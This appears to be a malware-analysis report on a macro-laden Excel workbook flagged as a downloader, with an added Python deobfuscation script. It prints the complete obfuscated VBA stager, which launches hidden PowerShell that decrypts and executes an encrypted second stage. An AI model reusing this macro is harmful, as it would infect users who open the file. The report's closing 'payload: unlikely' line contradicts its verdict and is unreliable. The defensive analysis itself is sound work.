Verdict: MALICIOUS
Risk Score: 356

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059.001 Command and Scripting Interpreter: PowerShell
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample contains VBA macros intended to run when the document is opened: both an AutoOpen and a Document_Open procedure call the same MyMacro routine (the AutoOpen and Document_Open heuristics). MyMacro concatenates an obfuscated PowerShell command line (powershell -Exec bypass -NonI -W Hidden ...) into a string and launches it through CreateObject("Wscript.Shell").Run. The PowerShell stage decrypts an embedded exported SecureString (header 76492d1116743f0423413b16050a5345) with a hardcoded 16-byte AES key, ConvertTo-SecureString -Key (227..242), recovers the plaintext through a PSCredential object's GetNetworkCredential().Password, and hands it to Invoke-Expression. The word "iex" never appears literally: it is spelled from characters of $ShellId and from a variable name matched by Get-Variable '*MDr*', and the literal's quotes and pipe are hidden behind SXB and a89 placeholders that a -replace chain restores at run time. The decrypted second stage cannot be recovered from the macro alone; ClamAV classifies the document as a downloader, consistent with that stage fetching and running a further payload. One caveat on the auto-execution claim: the container is an Excel workbook (xl/vbaProject.bin with Workbook and Worksheet class modules), whereas AutoOpen and Document_Open are Word auto-execution names (Excel runs Auto_Open and Workbook_Open instead), so whether these procedures actually fire on open should be confirmed by detonation rather than inferred from the heuristic names.
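The following Python script is an added analyst note, not part of the analyzer's report: it reverses the string-building and obfuscation layers statically by joining the Str = Str + "..." chunks from the macros.bas preview below, folding the PowerShell '+' concatenations, applying the stager's own -replace pairs after evaluating their [CHaR] operands, resolving both Invoke-Expression spellings, and extracting the exported SecureString blob together with the AES key range. The embedded input is a constructed excerpt of the macro (the base64 body is truncated to its first two and last lines); the $ShellId value and the list of automatic variables are assumptions about a default Windows PowerShell 5.1 session.

```python
"""Static deobfuscation of the PowerShell stager built by Sub MyMacro()."""
import re
from fnmatch import fnmatch

# Constructed test input: the `Str = Str + "..."` lines of Sub MyMacro() copied
# from the macros.bas preview in this report, with the long base64 body of the
# SecureString blob truncated to its first two and last lines so the example
# stays short. Paste every Str line from the report to recover the full blob.
SAMPLE_VBA = r'''
Sub MyMacro()
Dim Str As String
Str = Str + "powershell -Exec bypass -NonI -W Hidden (('& ((GeT"
Str = Str + "-VARIAble SXB*MDr*SXB).naMe[3,11,2]-joiNSXBSXB)( ("
Str = Str + " New-ObjeCT'+' mANAgement.AuToMaTION.PsCr'+'EDeNT"
Str = Str + "IaL SXB SXB,( SXB76492d1116743f0423413b16050a5345M"
Str = Str + "gB8AHMAYQBa'+'AE0AUwBZAEoAQgBWAHQANwAwAHcAO'+'QBLA"
Str = Str + "AGMAOAA0AGEANwAzAGYANABhAA==SXB'+' a89conVERtto-sE"
Str = Str + "CuREstrING -k (2'+'27..242) ) '+').getNETworkCred"
Str = Str + "ENtIal().PaSSword)') -rePLaCe ([CHaR]97+[CHaR]56+"
Str = Str + "[CHaR]57),[CHaR]124 -rePLaCe ([CHaR]83+[CHaR]88+["
Str = Str + "CHaR]66),[CHaR]39) | & ( $shELliD[1]+$sHELLID[13]+"
Str = Str + "'X')"
CreateObject("Wscript.Shell").Run Str
End Sub
'''

# Assumptions: $ShellId and the automatic variables present in a default
# Windows PowerShell 5.1 session; the sample indexes into these to spell "iex".
SHELL_ID = "Microsoft.PowerShell"
AUTOMATIC_VARIABLES = ["MaximumAliasCount", "MaximumDriveCount", "MaximumErrorCount",
                       "MaximumFunctionCount", "MaximumHistoryCount", "MaximumVariableCount"]
SECURESTRING_HEADER = "76492d1116743f0423413b16050a5345"  # ConvertFrom-SecureString -Key marker

CHAR_SUM = r"\(?(?:\[char\]\d+\+?)+\)?"
REPLACE_OP = re.compile(r"-replace\s+(" + CHAR_SUM + r")\s*,\s*(" + CHAR_SUM + r")", re.I)
SHELLID_INDEX = re.compile(r"\$shellid\[(\d+)\]", re.I)
GETVAR_INDEX = re.compile(r"\(\s*get-variable\s+'([^']*)'\s*\)\.name\[([\d,]+)\]\s*-join\s*''", re.I)
CONVERT_SS = re.compile(r"'(" + SECURESTRING_HEADER + r"[^']*)'\s*\|\s*convertto-securestring"
                        r"\s+-k\s*\((\d+)\.\.(\d+)\)", re.I)


def join_vba_chunks(vba_source):
    """Concatenate every `Str = Str + "..."` chunk into the string handed to WScript.Shell.Run."""
    return "".join(re.findall(r'^\s*Str = Str \+ "(.*)"\s*$', vba_source, re.M))


def char_sum(expr):
    """Evaluate a `[CHaR]97+[CHaR]56+[CHaR]57` expression to the string it spells."""
    return "".join(chr(int(n)) for n in re.findall(r"\[char\](\d+)", expr, re.I))


def eval_string_sum(expr):
    """Evaluate `$shELliD[1]+$sHELLID[13]+'X'`: $ShellId indexes become one-char literals, then concatenate."""
    expr = SHELLID_INDEX.sub(lambda m: "'" + SHELL_ID[int(m.group(1))] + "'", expr)
    return "".join(re.findall(r"'([^']*)'", expr))


def resolve_getvariable(pattern, indexes):
    """`(Get-Variable '*MDr*').Name[3,11,2] -join ''`: wildcard-match one variable name and pick characters."""
    names = [v for v in AUTOMATIC_VARIABLES if fnmatch(v.lower(), pattern.lower())]
    if len(names) != 1:
        raise ValueError(f"{pattern!r} matched {names}, cannot resolve")
    return "".join(names[0][int(i)] for i in indexes.split(","))


def deobfuscate(vba_source):
    cmd = join_vba_chunks(vba_source)
    cmd = cmd.replace("'+'", "")                       # 1. fold 'abc'+'def' into 'abcdef'
    launcher = re.match(r"(.*?)\s*\(\(", cmd).group(1)
    literal = re.search(r"'([^']*)'", cmd).group(1)    # 2. the quoted script the -replace chain rewrites
    replaces = [(char_sum(a), char_sum(b)) for a, b in REPLACE_OP.findall(cmd)]
    for old, new in replaces:
        literal = literal.replace(old, new)
    # 3. both hidden Invoke-Expression spellings: `& ($ShellId[1]+$ShellId[13]+'X')` outside,
    #    `& ((Get-Variable '*MDr*').Name[3,11,2] -join '')` inside the rewritten literal
    outer = re.search(r"\|\s*&\s*\((.*)\)\s*$", cmd).group(1)
    outer_invoker = eval_string_sum(outer).lower()
    literal = GETVAR_INDEX.sub(lambda m: resolve_getvariable(m.group(1), m.group(2)), literal)
    # 4. the encrypted second stage: an exported SecureString decrypted with a hardcoded AES key
    m = CONVERT_SS.search(literal)
    key = bytes(range(int(m.group(2)), int(m.group(3)) + 1))
    return {"launcher": launcher, "replaces": replaces, "outer_invoker": outer_invoker,
            "inner_script": literal, "securestring_blob": m.group(1), "aes_key": key}


if __name__ == "__main__":
    for name, value in deobfuscate(SAMPLE_VBA).items():
        print(f"{name}: {value}")
```

With all Str lines from the preview pasted in, the script yields the complete blob and the key (the 16 bytes 0xE3..0xF2, so AES-128). The blob is only decryptable with that key; the practical way to see the second stage is to run the recovered inner script in an isolated Windows VM with the leading `& (iex)` removed, so the plaintext is printed rather than executed, and to inspect it before relying on the ClamAV downloader classification.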
Heuristics 8

- ClamAV (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.5ddb7c-10001341-0
- VBA project inside OOXML (medium, OOXML_VBA, 6 related findings): document contains a VBA project; VBA macros present
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script:
  CreateObject("Wscript.Shell").Run Str
- PowerShell reference in VBA (critical, OLE_VBA_PS). Matched lines in script:
  Str = Str + "powershell -Exec bypass -NonI -W Hidden (('& ((GeT"
  Str = Str + "-VARIAble SXB*MDr*SXB).naMe[3,11,2]-joiNSXBSXB)( ("
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script:
  CreateObject("Wscript.Shell").Run Str
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched lines in script:
  Attribute VB_Name = "Module1"
  StrSub AutoOpen()
  MyMacro
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched lines in script:
  Sub Document_Open()
  MyMacro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6570 bytes |

SHA-256: 0ebaa8278c172fcd9df1643c265222dc649611aae52de036c77d609dea55a838

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Workbook______________"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Worksheet______1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{B804F40B-1E6A-4A91-91F4-168684F12A52}{E1749664-84C1-49C1-A0F9-A6574B6D21D0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
StrSub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim Str As String
Str = Str + "powershell -Exec bypass -NonI -W Hidden (('& ((GeT"
Str = Str + "-VARIAble SXB*MDr*SXB).naMe[3,11,2]-joiNSXBSXB)( ("
Str = Str + " New-ObjeCT'+' mANAgement.AuToMaTION.PsCr'+'EDeNT"
Str = Str + "IaL SXB SXB,( SXB76492d1116743f0423413b16050a5345M"
Str = Str + "gB8AHMAYQBa'+'AE0AUwBZAEoAQgBWAHQANwAwAHcAO'+'QBLA"
Str = Str + "HMAVAAwAH'+'gA'+'L'+'wBZAHcAPQA9AHwAYQ'+'AxAD'+'QA"
Str = Str + "OQA1ADEAMAA5AGIANQAxADAANwA5ADgAZ'+'gBkADUAZAA4ADA"
Str = Str + "ANQAzAGIAYwA0ADkANAA1'+'ADEANAAyAGIA'+'MABiADYAM'+"
Str = Str + "'wB'+'mADIANwBhADIAO'+'AAzADIAMgBiAGEAZgBkADcANwAy"
Str = Str + "AGQAMAA3AGQAMgA0ADgAZgBhADAANwBiAGUANwBlADUAMwB'+'"
Str = Str + "lAGUANgBmADgAZQA1AGUANQBiAGUAMQBlAGUAYwAyADIAYgAwA"
Str = Str + "GIAYQA4ADUAYgBjAG'+'MAMQB'+'jAGMAMwA0AGIAMAA2AGIAY"
Str = Str + "QAzAGMANAAzAGQAM'+'gA0AGUAZg'+'AxADkAMgBlADYAOQBhA"
Str = Str + "GQAMAA3ADkANgA1ADkANQBhAGQAY'+'wBkADc'+'AOAA5'+'AG"
Str = Str + "QANQBhADEAM'+'AA2AGQAZAAxADkANgBhAGMAYQBkAGQAMwA2A"
Str = Str + "GYAOAAxADQANQAzADcAMQAxAGMAMQ'+'Bi'+'A'+'D'+'cAYgA"
Str = Str + "0ADIAOQA1AGUAYgBlAGEAZAA2ADcAYgA5ADkANgA1ADAANwBiA"
Str = Str + "DQANABhAGQ'+'AYwA1ADEAMwA4ADEAM'+'QA2'+'ADMAZQAwAG"
Str = Str + "QAZQA5AGQAZQA5AGMAOQBhADAAYwAyADYAO'+'QBiAGMAOABj'"
Str = Str + "+'ADcANgAzAGQANQA1AGMAZQA4ADk'+'AOQAxAGEAMQAwADQAO"
Str = Str + "A'+'A3ADk'+'AOABjAGMANgA4AGMA'+'YQA1ADAANgA5ADEAYQ"
Str = Str + "'+'BlAGQAYwBiAGMAZgAzAGMAZAA4ADIAZQA1ADgA'+'Z'+'gA"
Str = Str + "1AGYANgBjAGIAYQA0ADIAYQBkADMAYQAxADIAMAAxAGMANAAzA"
Str = Str + "'+'DEANgBmADMAMgA1ADYANgBhADQAZgA4AGEAMAA0ADQANwBk"
Str = Str + "ADkANgBkAGUANQA0AGEAYwA1ADQAMABmAGI'+'AZQBjADkAZQA"
Str = Str + "z'+'AGUAZQA5ADYANAA2AGMAMABhADcAZQBkAGYAZgBiAGUAMw"
Str = Str + "AxAGMAZQ'+'BiADgAMAA4ADUAMgBkAGUAZQA2AGYANgA3ADgA'"
Str = Str + "+'NABiADQANAAxAGIAMg'+'BjADgAMgBmADMAZAA4ADMAYwA2A"
Str = Str + "DgAYQA3AGEAYQBiAGIAMQA1AD'+'MAMgAxAGIAZgA3AGQA'+'M"
Str = Str + "QA5ADgA'+'ZgA3A'+'DYANAAzADcANwA1AGIANQAxADYAMgAyA"
Str = Str + "GYANABhADQAZgAwADIAYQA2AGUAOAA1AGQAMAAyADAANQ'+'Bl"
Str = Str + "ADAAYwBiADIANQAzADkAMAAyADkAYgBlADMANwAxADUAOQAyAG"
Str = Str + "IAMwA2AGUAYQA1AGMAMAA2ADcA'+'NAAzADgAYQBlADUANgAxA"
Str = Str + "DcAY'+'QA1ADgANgBkADQAMABkADkAMAAxADgAYQBmAGQAMABi"
Str = Str + "AGIAYgBiAGEAZQA1AGUANgA3AGMANQAzAGEANQA1AG'+'MAZAA"
Str = Str + "1ADUAOQA2ADgAMwA'+'2AGQANgBjADcAMwA1AGQANgBlAGQAOA"
Str = Str + "AzAGQANgBmADgANgA1AGYAYQA0ADkAN'+'A'+'BiADgANwA4AG"
Str = Str + "M'+'AOABhAGMAOQBmAGUAZQBjADIAMgA1ADAAMQAzAGEANwBmA"
Str = Str + "DYANwBmADQAMQA0ADAAMQA1ADIANwAyAGYAMwBkADAAZgA4ADY"
Str = Str + "ANwBiA'+'DcAZgAwAGQAYwA'+'wAGIAMAAwAGYANAA4'+'ADEA"
Str = Str + "ZAAyADAANQBiADYANgA5ADEAMABmADcAY'+'gBhAGQANQA2AGI"
Str = Str + "AMQBjADkAYwBlADUAZAA4ADgAMgA'+'1'+'ADkAZgA1ADkAOAA"
Str = Str + "zADAAZAA5AGEAZQA0ADkANwAyAGYANwA1AGUAMQAyAGYAYQAyA"
Str = Str + "DgAMQAxAGQAMAAzAGYAMgA5AGMANQA4AGYAOQ'+'BmADEANwAw"
Str = Str + "ADYAMQBhADUAYwA0AGYAMABiAGIA'+'MwBlAGMANgA5AGIAMgB"
Str = Str + "iAGUA'+'MgAxAGMAZABmADYAMgBiA'+'DgAMABhADkANgBlAGU"
Str = Str + "AOAB'+'jAGUAMwA2AG'+'Q'+'ANABmAGIAMQBjADkAMgA3ADAA"
Str = Str + "OABhADkAMwB'+'mADgANQBiAGMAZAAxAGEAZQBkADEAMwAxAGQ"
Str = Str + "AYwBlADIAMQBiAGUAMgBkADMANwBhADcAN'+'wBkAGYAMg'+'A"
Str = Str + "yADkAYwA5ADUAOAAyADkANAA4ADcAZgA4ADAANQBmADIAYQ'+'"
Str = Str + "AzADUAMABkAGIANQBjAGQAMAAzADMANwA2ADQAMgAzADMAYgA4"
Str = Str + "ADMAZQA1AD'+'AAYwBjADgAOQA5ADgAZAA3ADQAZA'+'BhADMA"
Str = Str + "YQAxADEAMgA4AGUANAA4ADgAZQBkAGIANgB'+'lAGMAZgBmADY"
Str = Str + "AMwAyAGQAMgBkAGMAMgBlADAAMAA1ADYAMw'+'A0ADgAYgAzAG"
Str = Str + "IAYwA0ADkAZQBlAGIAYgA'+'5ADcAYgBlAGUANwA1AGQAMABmA"
Str = Str + "DkAZAAzAGEAMwAwAD'+'gANwAzADgAYQA4ADcAZgBlADcANAA4"
Str = Str + "AGEANwA3AGQAZgBiADAANgAyAGUAYgA1AGQAZAA1ADUAOABiAD"
Str = Str + "MANABmADMAZABmADQANgA3AGIA'+'NQ'+'BjADQAOAA1ADYAMg"
Str = Str + "A5AGQAYQA1AGUAOAA4AGUAZQA3ADMANABkADEAZQA4AGIAMAAw"
Str = Str + "ADAAOAA4ADgAOQA3ADkAMAAyADAANAAwAGEAZQBmAG'+'UAMQB"
Str = Str + "lADkAYQBjADgAMQB'+'lAGQAMQA2ADkANgBmAGQAZgA3ADYANA"
Str = Str + "A2A'+'DMANgA0ADAAZgA2ADcAZAA1AGIANAAwADkAYgA2ADEAN"
Str = Str + "QA2ADIAOABkADAAZQBhAG'+'EAZABkAGEAMgAzAGIANgAzADMA"
Str = Str + "MAA1AGUAMQAzAGQAMwA0AGYAYgA5ADcAMgA'+'yADQAZAAzADg"
Str = Str + "AMgAy'+'ADQANgAzADYAMwBlADAAOQA2ADYAMABhAGQ'+'AYQA"
Str = Str + "4ADAAMQAzADUANgBjADMAMwAyADgANABmADQANABjADEANwA'+"
Str = Str + "'zAGI'+'AMgA5AGUAMABlAGYAMABh'+'AGIAN'+'wAwAGEAMAA"
Str = Str + "yADAAYQA3A'+'DIANQA4ADcANAA1A'+'DMAMgA4ADMAN'+'wBl"
Str = Str + "'+'ADkAYQA0ADAAOQA3ADMAYwBmAGQAZAAxADYAOQA2ADQAMgA"
Str = Str + "3ADIA'+'ZAAyADY'+'AZAA5ADYAMwBmAGIAYQBhADcAZAA4ADQ"
Str = Str + "AOQBkAGMAOAA4AGIAOQBhADEAMQBmADIAMgAxAGUANQBhAGQAM"
Str = Str + "AAyAGEAZgA5ADgANwAzAGEANwAwADEAMgBjAGEAYgA5ADIAMgB"
Str = Str + "hADIAZABkAGYAZgA1ADcANgBmADUANQAxADYAMQA1ADUANAA1A"
Str = Str + "DgAZQA1AGQAMAA3ADAAYQBkADgAYgAzADgAOAAyADU'+'ANgAx"
Str = Str + "AGMAOAA0AGEANwAzAGYANABhAA==SXB'+' a89conVERtto-sE"
Str = Str + "CuREstrING -k (2'+'27..242) ) '+').getNETworkCred"
Str = Str + "ENtIal().PaSSword)') -rePLaCe ([CHaR]97+[CHaR]56+"
Str = Str + "[CHaR]57),[CHaR]124 -rePLaCe ([CHaR]83+[CHaR]88+["
Str = Str + "CHaR]66),[CHaR]39) | & ( $shELliD[1]+$sHELLID[13]+"
Str = Str + "'X')"
CreateObject("Wscript.Shell").Run Str
End Sub
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 24576 bytes |

SHA-256: 175121cfe070eb5e67c45451f02fba9eeba41956ad9897166b9f0a28c3852ee3

Detection
ClamAV: Doc.Downloader.5ddb7c-10001341-0
Obfuscation or payload: unlikely